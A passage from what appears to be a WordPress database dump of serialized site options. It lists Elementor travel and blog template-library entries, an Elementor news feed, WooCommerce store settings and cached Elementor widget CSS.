page\";s:4:\"tags\";s:24:\"[\"404\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:666;s:16:\"popularity_index\";i:747;s:11:\"trend_index\";i:712;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:811;a:19:{s:4:\"tmpl\";i:929;s:2:\"id\";i:12516;s:5:\"title\";s:27:\"Travel &#8211; Archive Blog\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/12/Archiv_s.png\";s:12:\"tmpl_created\";i:1575960387;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/travel-archive-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:667;s:16:\"popularity_index\";i:496;s:11:\"trend_index\";i:487;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:812;a:19:{s:4:\"tmpl\";i:927;s:2:\"id\";i:12500;s:5:\"title\";s:21:\"Travel &#8211; Header\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-travel-and-tours.png\";s:12:\"tmpl_created\";i:1575960371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/travel-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:668;s:16:\"popularity_index\";i:443;s:11:\"trend_index\";i:434;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:813;a:19:{s:4:\"tmpl\";i:930;s:2:\"id\";i:12524;s:5:\"title\";s:26:\"Travel &#8211; Single Post\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/12/Single_Post_s.png\";s:12:\"tmpl_created\";i:1575960397;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:669;s:16:\"popularity_index\";i:591;s:11:\"trend_index\";i:663;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:814;a:19:{s:4:\"tmpl\";i:931;s:2:\"id\";i:12531;s:5:\"title\";s:31:\"Travel &#8211; Single Post Tour\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/12/Single_Tour_s.png\";s:12:\"tmpl_created\";i:1575960404;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/travel-single-post-tour/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:670;s:16:\"popularity_index\";i:630;s:11:\"trend_index\";i:548;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:815;a:19:{s:4:\"tmpl\";i:926;s:2:\"id\";i:12492;s:5:\"title\";s:14:\"Travel -Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/12/Footer_s.png\";s:12:\"tmpl_created\";i:1575960358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/travel-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:671;s:16:\"popularity_index\";i:453;s:11:\"trend_index\";i:322;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:816;a:19:{s:4:\"tmpl\";i:1068;s:2:\"id\";i:15498;s:5:\"title\";s:23:\"Travel Blog &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/11/404.jpg\";s:12:\"tmpl_created\";i:1606215636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/travel-blog-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:23:\"[\"404\",\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:672;s:16:\"popularity_index\";i:749;s:11:\"trend_index\";i:759;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:817;a:19:{s:4:\"tmpl\";i:1069;s:2:\"id\";i:15508;s:5:\"title\";s:29:\"Travel Blog &#8211; Archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-1-350.jpg\";s:12:\"tmpl_created\";i:1606215649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:673;s:16:\"popularity_index\";i:659;s:11:\"trend_index\";i:468;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:818;a:19:{s:4:\"tmpl\";i:1070;s:2:\"id\";i:15518;s:5:\"title\";s:29:\"Travel Blog &#8211; Archive 2\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-2-350-Copy.jpg\";s:12:\"tmpl_created\";i:1606215663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:674;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:431;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:819;a:19:{s:4:\"tmpl\";i:1071;s:2:\"id\";i:15528;s:5:\"title\";s:26:\"Travel Blog &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Footer.jpg\";s:12:\"tmpl_created\";i:1606215673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:26:\"[\"Blog\",\"Footer\",\"Travel\"]\";s:10:\"menu_order\";i:675;s:16:\"popularity_index\";i:656;s:11:\"trend_index\";i:377;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:820;a:19:{s:4:\"tmpl\";i:1067;s:2:\"id\";i:15536;s:5:\"title\";s:26:\"Travel Blog &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Header.jpg\";s:12:\"tmpl_created\";i:1606215625;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:26:\"[\"Blog\",\"Header\",\"Travel\"]\";s:10:\"menu_order\";i:676;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:228;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:821;a:19:{s:4:\"tmpl\";i:1072;s:2:\"id\";i:15545;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-1-350.jpg\";s:12:\"tmpl_created\";i:1606215684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:677;s:16:\"popularity_index\";i:669;s:11:\"trend_index\";i:482;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:822;a:19:{s:4:\"tmpl\";i:1066;s:2:\"id\";i:15556;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 2\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-2-350.jpg\";s:12:\"tmpl_created\";i:1606215613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:678;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:454;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','no'),(484,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:71:\"6 Best WordPress Image Optimization Plugins of 2024 (+Real Image Tests)\";s:7:\"excerpt\";s:116:\"Explore the top 6 WordPress image optimization plugins of 2024 for faster site speed and better SEO with real tests.\";s:7:\"created\";i:1712656602;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:126:\"https://elementor.com/blog/image-optimization-plugins/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:84:\"Introducing Elementor 3.20: New Display Condition Features, Performance Improvements\";s:7:\"excerpt\";s:189:\"Version 3.20 introduces exciting new features that enhance the flexibility of Display Conditions. This version also improves the loading time of your site’s frontend and backend, and more\";s:7:\"created\";i:1710845895;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:167:\"https://elementor.com/blog/elementor-320-display-conditions-enhacments-peformance-improvements/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:97:\"Introducing Elementor 3.19: Display Conditions, Role Permissions in the Element Manager, and More\";s:7:\"excerpt\";s:230:\"Create dynamic visitor experiences, customize your teammates’ widget panels, protect forms from spam submissions, generate variations in the template library, and use URLs from the open web as a reference to generate containers.\";s:7:\"created\";i:1707315304;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:152:\"https://elementor.com/blog/elementor-319-display-conditions-akismet-integration/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','no'),(503,'mc4wp_flash_messages','a:0:{}','no'),(508,'_transient_product_query-transient-version','1668397067','yes'),(509,'wp_calendar_block_has_published_posts','1','yes'),(517,'_transient_product-transient-version','1668396662','yes'),(519,'woocommerce_demo_store_notice','This is a demo store for testing purposes &mdash; no orders shall be fulfilled.','yes'),(520,'woocommerce_shop_page_display','','yes'),(521,'woocommerce_category_archive_display','','yes'),(522,'woocommerce_default_catalog_orderby','popularity','yes'),(523,'woocommerce_catalog_columns','3','yes'),(524,'woocommerce_catalog_rows','3','yes'),(525,'woocommerce_thumbnail_cropping','1:1','yes'),(526,'woocommerce_thumbnail_cropping_custom_width','4','yes'),(527,'woocommerce_thumbnail_cropping_custom_height','3','yes'),(528,'woocommerce_checkout_company_field','optional','yes'),(529,'woocommerce_checkout_address_2_field','optional','yes'),(530,'woocommerce_checkout_phone_field','required','yes'),(531,'woocommerce_checkout_terms_and_conditions_checkbox_text','I have read and agree to the website [terms]','yes'),(532,'nav_menus_created_posts','a:0:{}','yes'),(533,'_transient_wc_count_comments','O:8:\"stdClass\":7:{s:14:\"total_comments\";i:8;s:3:\"all\";i:8;s:9:\"moderated\";s:1:\"4\";s:8:\"approved\";s:1:\"4\";s:4:\"spam\";i:0;s:5:\"trash\";i:0;s:12:\"post-trashed\";i:0;}','yes'),(537,'_elementor_global_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;b:0;}','yes'),(541,'_elementor_assets_data','a:1:{s:3:\"css\";a:1:{s:7:\"widgets\";a:35:{s:8:\"ova_logo\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:26:\"retirio_elementor_menu_nav\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:30:\"retirio_elementor_search_popup\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:29:\"retirio_elementor_menu_canvas\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:17:\"slider_revolution\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:23:\"retirio_elementor_image\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:25:\"retirio_elementor_heading\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:11:\"text-editor\";a:2:{s:7:\"content\";s:718:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-text-editor.elementor-drop-cap-view-stacked .elementor-drop-cap{background-color:#818a91;color:#fff}.elementor-widget-text-editor.elementor-drop-cap-view-framed .elementor-drop-cap{color:#818a91;border:3px solid;background-color:transparent}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap{margin-top:8px}.elementor-widget-text-editor:not(.elementor-drop-cap-view-default) .elementor-drop-cap-letter{width:1em;height:1em}.elementor-widget-text-editor .elementor-drop-cap{float:left;text-align:center;line-height:1;font-size:50px}.elementor-widget-text-editor .elementor-drop-cap-letter{display:inline-block}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:6:\"button\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:28:\"ovasev_elementor_service_box\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:30:\"ova_elementor_project_filter_2\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:9:\"icon-list\";a:2:{s:7:\"content\";s:131:\"<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\";s:7:\"version\";s:5:\"3.8.1\";}s:8:\"progress\";a:2:{s:7:\"content\";s:1401:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:5:\"image\";a:2:{s:7:\"content\";s:268:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:29:\"retirio_elementor_testimonial\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:32:\"retirio_elementor_ova_icon_box_2\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:29:\"retirio_elementor_blog_grid_2\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:7:\"heading\";a:2:{s:7:\"content\";s:672:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:9:\"shortcode\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:30:\"retirio_elementor_contact_info\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:12:\"social-icons\";a:2:{s:7:\"content\";s:5183:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:29:\"retirio_elementor_menu_footer\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:31:\"retirio_elementor_header_banner\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:28:\"ova_elementor_project_filter\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:26:\"ova_elementor_data_project\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:27:\"ova_elementor_photo_gallery\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:9:\"accordion\";a:2:{s:7:\"content\";s:1701:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-con-inner>.elementor-widget-accordion,.e-con>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:29:\"ovasev_elementor_service_list\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:8:\"icon-box\";a:2:{s:7:\"content\";s:130:\"<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">\";s:7:\"version\";s:5:\"3.8.1\";}s:11:\"google_maps\";a:2:{s:7:\"content\";s:178:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:25:\"retirio_elementor_counter\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:8:\"ova_team\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:33:\"ova_elementor_project_filter_ajax\";a:2:{s:7:\"content\";s:0:\"\";s:7:\"version\";s:5:\"3.8.1\";}s:6:\"spacer\";a:2:{s:7:\"content\";s:932:\"<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>\";s:7:\"version\";s:5:\"3.8.1\";}s:7:\"gallery\";a:2:{s:7:\"content\";s:7769:\"<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid 